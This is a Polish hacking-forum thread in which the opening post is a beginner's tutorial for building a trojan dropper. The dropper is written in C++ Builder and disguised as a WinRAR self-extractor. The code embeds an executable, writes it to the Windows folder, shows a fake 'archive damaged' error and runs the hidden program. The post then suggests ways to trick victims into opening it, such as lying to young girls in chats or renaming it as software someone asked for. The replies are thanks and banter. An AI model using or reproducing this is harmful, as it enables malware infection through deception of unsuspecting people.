bugwie
 Szukaj  Grupy  Top 12  Profil   Nie masz nowych wiadomości   Wyloguj [ Olisadebe ]
bugwie
 35   Beczkowóz  Archiwum SB  Loteria  Images BW  Melina
 

Trojany dla początkujących  

Odpowiedz do tematu  
Poprzedni temat :: Następny temat
Autor Wiadomość
Bondzio



Dołączył: 15 Kwi 2013
Posty: 11420
Pochwał: 592
Beczki: 466
Qspaje: 1,429
Poziom: 10
Skąd: Ukryte
Bug beki

 Wysłany: 06-12-2013, 15:15   Trojany dla początkujących Schowek   Zgłoś post

Jest wiele sposobów na podrzucenie komuś trojana.
Nie odkryłem Ameryki, ale uważam, że ten sposób połączony z socjotechniką na chociażby
podstawowym poziomie może przynieść oczekiwane efekty.

Tworzymy dwa pliki textowe o rozszerzeniach *.RC i *.RH
Nazwa obydwóch musi być identyczna. W przykładzie przyjąłem, że te pliki to app.rh i app.rc

Zawartość pliku *.RC
-----------------------------------

Kod:

#include "app.rh"

<--nazwa pliku *.RH

Kod:

ID_APPL RCDATA "C:\\plik.exe"

<--nazwa programu wraz ze ścieżką do niego
-----------------------------------
Zawartość pliku *.RH
-----------------------------------

Kod:

#ifndef APP_RH

<--Gdzie APP to nazwa tworzonych właśnie plików

Kod:

#define APP_RH

<--Gdzie APP to nazwa tworzonych właśnie plików

Kod:

#define ID_APPL 1000

<--Gdzie ID_APPL to identyfikator zasobu. Liczba pozostaje bez zmian.

Kod:

#endif

-----------------------------------

Otwieramy BCB (testowane na BCB6)
Tworzymy nowy projekt
Ustawiamy wartości Form1 na:

Caption = Winrar Self Extractor
Color = clMaroon
TransparentColor = True
TransparentColorValue = clMaroon (Taki sam kolor jak podany w wartości "Color")
BorderStyle = BsNone

W menu "Project" wybieramy "Add To Project..." i wybieramy wcześniej utworzony plik *.RC

W pliku źródłowym Unit1.cpp

Pod wpisem #include "Unit1.h" dodajemy
-----------------------------------

Kod:

#include <memory>


Kod:

#include "app.rh"

<--nazwa pliku *.RH (Pliki *.RC i *.RH muszą być w tym samym folderze)
-----------------------------------
Tworzymy funkcje wypakowywującą nasz plik:
-----------------------------------------------

Kod:

void __fastcall Extractor(unsigned short ID, AnsiString FileName)
{
HRSRC rsrc = FindResource(HInstance, MAKEINTRESOURCE(ID), RT_RCDATA);
if(!rsrc)
{
Application->MessageBox("Archiwum uszkodzone",
"WinRar Self Extractor", MB_OK | MB_ICONSTOP);
return;
}

DWORD Size = SizeofResource(HInstance, rsrc);
HGLOBAL MemoryHandle = LoadResource(HInstance, rsrc);

if(MemoryHandle == NULL) return;

BYTE *MemPtr = (BYTE *)LockResource(MemoryHandle);

std::auto_ptr<TMemoryStream>stream(new TMemoryStream);
stream->Write(MemPtr, Size);
stream->Position = 0;

TMemoryStream *Ms = new TMemoryStream;
Ms->Position = 0;
Ms->LoadFromStream(stream.get());
Ms->Position = 0;
Ms->SaveToFile(FileName);
Ms->Free();
}

-------------------------------------------------

Funkcje wywołujemy w zdarzeniu Form1 OnActivate
-------------------------------------------------

Kod:

Extractor(ID_APPL, "C:\\Windows\\plik.exe");

<-ID_APPL identyfiktor pliku a ścieżka to miejsce docelowe

Kod:

Application->MessageBox("Archiwum uszkodzone.","Winrar Self Extractor",
MB_OK | MB_ICONHAND );

<-- Fałszywy komunikat o uszkodzeniu archiwum

Kod:

WinExec("C:\\Windows\\plik.exe", SW_SHOW);

<--Urachamia wypakowany plik

Kod:

Close();

<--Wiadomo chyba....
-------------------------------------------------

Project\Options\Packages i odznaczamy "Build with runtime packages"
Przechodzimy do zakładki Linker o odznaczamy "Use dynamic RTL" i "Use debug libraries"
Dopiero kompilujemy itd.

Ok. Doszliśmy do końca projektu (prawie).
Teraz wystarczy zmienić domyślną ikonę programu na ikone Self Extractora z Winrara.
Jeśli jej nie mamy bardzo prosto można ją wyciągnąć programem IrfanView.
Well Done (znowu prawie).

Teraz kilka wariantów na podrzucenie komuś tak spreparowanego pliku:

1. Głupim lolitkom na czatach mówiąc, że to kolekcja ze stu spakowanych zdjęć.
Jak by były wbrew pozorom nie ufne to mówisz, że dodawanie stu załączników jest
trochę uciążliwe i czasochłonne, a masz tyle zdjęć bo jesteś modelem itd..
Na pewno łykną.

2. Czekasz aż ktoś z sieci zapyta Cię o jakiś ważny dla niego program wtedy zmieniasz nazwę pliku na program którego szuka i dajesz mu to czego szukał ;)

3. Udostępniasz w sieci Plik z nazwą np. "9999 Tips & Tricks" lub coś w podobnie na co jest popyt i czekasz.
_________________

Chłodnik kurwa xD
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Remik



Dołączył: 25 Sty 2013
Posty: 6776
Pochwał: 291
Beczki: 593
Qspaje: 2,494
Poziom: 10
Remik krul

 Wysłany: 06-12-2013, 23:52    Schowek   Zgłoś post

Napisałbym poradnik na dobry phlising, ale zapodziałem plik z danymi, a nie pamiętam kodu. Ema.
_________________
cyka blyat nahui xD
Powrót do góry
Postaw beczke autorowi tego posta
 
 
kupamen



Dołączył: 19 Kwi 2013
Posty: 145
Pochwał: 13
Ostrzeżeń: 1/4
Beczki: 4
Qspaje: 27
Poziom: 0

 Wysłany: 14-12-2013, 13:19    Schowek   Zgłoś post

przyda sie dzienki
Powrót do góry
Postaw beczke autorowi tego posta
 
 
zjamnik



Dołączył: 17 Kwi 2013
Posty: 264
Użytkownik zbanowany
Zakaz pisania
Pochwał: 3
Ostrzeżeń: 2/4
Beczki: 1
Qspaje: 0
Poziom: 0

 Wysłany: 14-12-2013, 19:03    Schowek   Zgłoś post

I co to niby robi?
_________________
Twoja sygnatura była nieregulaminowa i została usunięta przez coś.
Zapoznaj się z regulaminem.
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Bondzio



Dołączył: 15 Kwi 2013
Posty: 11420
Pochwał: 592
Beczki: 466
Qspaje: 1,429
Poziom: 10
Skąd: Ukryte
Bug beki

 Wysłany: 14-12-2013, 20:03    Schowek   Zgłoś post

zjamnik napisał:
I co to niby robi?

ZA TAKIE NIEŚMIESZNE ŻARTY O TEJ GODZINIE NIE RAZ JUŻ BANY LECIAŁY

Serio.
_________________

Chłodnik kurwa xD
Powrót do góry
Postaw beczke autorowi tego posta
 
 
pikus



Dołączył: 23 Gru 2013
Posty: 147
Użytkownik zbanowany
Zakaz pisania
Pochwał: 4
Ostrzeżeń: 4/4
Beczki: 1
Qspaje: 0
Poziom: 0

 Wysłany: 23-12-2013, 14:42    Schowek   Zgłoś post

Dzięki, przyda się :thumbup:
Powrót do góry
Postaw beczke autorowi tego posta
 
 
rusek



Dołączył: 07 Gru 2013
Posty: 204
Pochwał: 3
Beczki: 4
Qspaje: 0
Poziom: 0

 Wysłany: 23-01-2014, 11:49    Schowek   Zgłoś post

a gdzie jakieś pliki próbne? bo pisać mi się nie chce ;P
Powrót do góry
Postaw beczke autorowi tego posta Usuń ze swoich znajomych
 
 
pawian



Dołączył: 05 Lis 2013
Posty: 16516
Pochwał: 461
Ostrzeżeń: 4/6
Beczki: 465
Qspaje: 10,663
Poziom: 10
Bug beki

 Wysłany: 23-01-2014, 13:00    Schowek   Zgłoś post

Pliki próbne pewnie usunięte z powodu trojanów :czesc:
_________________
Powrót do góry
Postaw beczke autorowi tego posta
 
 
rusek



Dołączył: 07 Gru 2013
Posty: 204
Pochwał: 3
Beczki: 4
Qspaje: 0
Poziom: 0

 Wysłany: 23-01-2014, 13:09    Schowek   Zgłoś post

na serwerze jest antywirus?
Powrót do góry
Postaw beczke autorowi tego posta Usuń ze swoich znajomych
 
 
TR-17F



Dołączył: 21 Mar 2014
Posty: 63
Pochwał: 4
Beczki: 1
Qspaje: 0
Poziom: 0

 Wysłany: 17-05-2014, 22:28    Schowek   Zgłoś post

Tak, Avast.
Poradnik fajny, ciekawe czy sam pisałeś czy copy & paste.
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Remik



Dołączył: 25 Sty 2013
Posty: 6776
Pochwał: 291
Beczki: 593
Qspaje: 2,494
Poziom: 10
Remik krul

 Wysłany: 17-05-2014, 22:37    Schowek   Zgłoś post



Musiałem xD
_________________
cyka blyat nahui xD

Autor postu otrzymał beczki od: Dranz
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Ridż



Dołączył: 13 Kwi 2013
Posty: 40564
Pochwał: 1563
Beczki: 724
Qspaje: 2,993
Poziom: 11
Powrót Króla

 Wysłany: 17-05-2014, 22:43    Schowek   Zgłoś post

Remik napisał:


Musiałem xD

chujowe, niezabawne
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Remik



Dołączył: 25 Sty 2013
Posty: 6776
Pochwał: 291
Beczki: 593
Qspaje: 2,494
Poziom: 10
Remik krul

 Wysłany: 19-05-2014, 16:06    Schowek   Zgłoś post

Ridż napisał:

Musiałem xD

chujowe, niezabawne[/quote]

Przepraszam, że wyśmiewam się z Twojej dziewczyny :badger:
_________________
cyka blyat nahui xD
Powrót do góry
Postaw beczke autorowi tego posta
 
 
Ridż



Dołączył: 13 Kwi 2013
Posty: 40564
Pochwał: 1563
Beczki: 724
Qspaje: 2,993
Poziom: 11
Powrót Króla

 Wysłany: 19-05-2014, 16:16    Schowek   Zgłoś post

Remik napisał:
Przepraszam, że wyśmiewam się z Twojej dziewczyny :badger:

:b: :b:
Mimo wszystko to chujowe.
Powrót do góry
Postaw beczke autorowi tego posta
 
 
    
Szybka odpowiedź
Treść wiadomości

Emotikony
Wybierz kolor:
 Rozmiar:
 
Odpowiedz do tematu 

Śledź odpowiedzi w tym temacie
Oznacz temat jako nieczytany
Skocz do:  



Powered by phpBB modified by Przemo © 2003 phpBB Group
Theme bLock modified by Remik & ns
bugwie.com © 2013-2016